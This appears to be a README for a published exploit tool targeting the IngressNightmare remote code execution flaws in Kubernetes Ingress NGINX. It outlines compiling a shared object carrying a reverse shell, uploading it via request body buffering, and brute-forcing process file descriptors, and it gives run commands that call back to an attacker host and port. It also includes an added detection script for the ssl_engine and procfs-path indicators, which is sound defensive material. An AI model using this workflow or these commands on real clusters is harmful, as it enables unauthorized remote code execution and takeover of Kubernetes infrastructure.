## https://sploitus.com/exploit?id=4955A569-D553-55C1-A765-0011835FE7B4
## Exploit for Ingress NGINX - IngressNightmare

This project provides an exploit targeting critical **unauthenticated Remote Code Execution (RCE)** vulnerabilities in the Ingress NGINX Controller for Kubernetes, collectively referred to as IngressNightmare.

In the original research, the Wiz team did not provide a PoC or a functional exploit, so we decided to create our own and share it with the community.

#### Overview

The Ingress NGINX Controller is a widely used component in Kubernetes environments, managing external access to services within clusters. Recent vulnerabilities (CVE-2025-1097, CVE-2025-1098, CVE-2025-24514, CVE-2025-1974) have highlighted critical security risks.

### **Exploit Workflow**

The exploit follows these main steps:

**Generate shared object** (used by the injected `ssl_engine` property):
*Compiles a .so library (evil_engine.so) containing a reverse shell payload.*

**Upload the shared object**:
*Sends the compiled shared object to the ingress pod, leveraging request handling (client body buffers). The trick here is to send a different `Content-Length` to the server to keep the connection open.*

**Brute-force fd**:
*Iterates over process IDs and file descriptors (/proc/{pid}/fd/{fd}) to identify the correct descriptor referencing the uploaded object.*
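
For defenders, the workflow above leaves two strings that can be checked for in Ingress objects submitted to the admission webhook: an `ssl_engine` directive and a `/proc/{pid}/fd/{fd}` path. The following is an added detection example, not part of this project's code; the function names, the placeholder annotation key and the sample AdmissionReview objects are constructed for illustration.

```python
import re

# Indicators taken from the workflow described above.
INDICATORS = {
    "ssl_engine directive": re.compile(r"\bssl_engine\b", re.IGNORECASE),
    "procfs fd path": re.compile(r"/proc/\d+/fd/\d+"),
}

def make_review(annotation_value):
    """Build a constructed AdmissionReview; the annotation key is a placeholder."""
    return {
        "apiVersion": "admission.k8s.io/v1",
        "kind": "AdmissionReview",
        "request": {"object": {
            "kind": "Ingress",
            "metadata": {"name": "demo",
                         "annotations": {"example.invalid/note": annotation_value}},
            "spec": {"rules": [{"host": "app.example.invalid"}]},
        }},
    }

SAMPLE_SUSPICIOUS = make_review("x ssl_engine /proc/33/fd/7 x")  # constructed
SAMPLE_BENIGN = make_review("owned by team-a")                   # constructed

def iter_strings(node, path=""):
    """Yield (field_path, value) for every string in a nested object."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield from iter_strings(value, f"{path}.{key}" if path else key)
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from iter_strings(value, f"{path}[{index}]")
    elif isinstance(node, str):
        yield path, node

def scan_admission_review(review):
    """Return (field_path, indicator) findings for an Ingress AdmissionReview."""
    obj = review.get("request", {}).get("object") or {}
    if obj.get("kind") != "Ingress":
        return []
    return [(path, name)
            for path, value in iter_strings(obj)
            for name, pattern in INDICATORS.items()
            if pattern.search(value)]

if __name__ == "__main__":
    for label, review in (("suspicious", SAMPLE_SUSPICIOUS), ("benign", SAMPLE_BENIGN)):
        print(label, scan_admission_review(review))
```

Every string field is scanned rather than a fixed list of annotations, so the check does not depend on knowing which field carried the injected directive.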

#### Usage

Prerequisites:
- Python 3.x
- GCC compiler
- Python requests module

Run exploit:

`pip3 install -r requirements.txt`

`python3 exploit.py <ingress_url> <admission_webhook_url> <attacker_host:port>`

Ex: `python3 poc.py http://192.168.0.154 https://rke2-ingress-nginx-controller-admission.kube-system 192.168.1.63:443`

Sometimes the `admission webhook` is in a different namespace. In this case, you need to specify the namespace at the end, such as `kube-system`, `default`, or `ingress-nginx`.

- `<ingress_url>`: Target Ingress URL (public)
- `<admission_webhook_url>`: Admission webhook URL (internal webhook)
- `<attacker_host:port>`: Your host and port for reverse shell

**Disclaimer**

This exploit is provided strictly for educational and research purposes. Unauthorized use of this tool against targets without explicit permission is prohibited. Hakai Security and QuimeraX hold no responsibility for any misuse of this tool.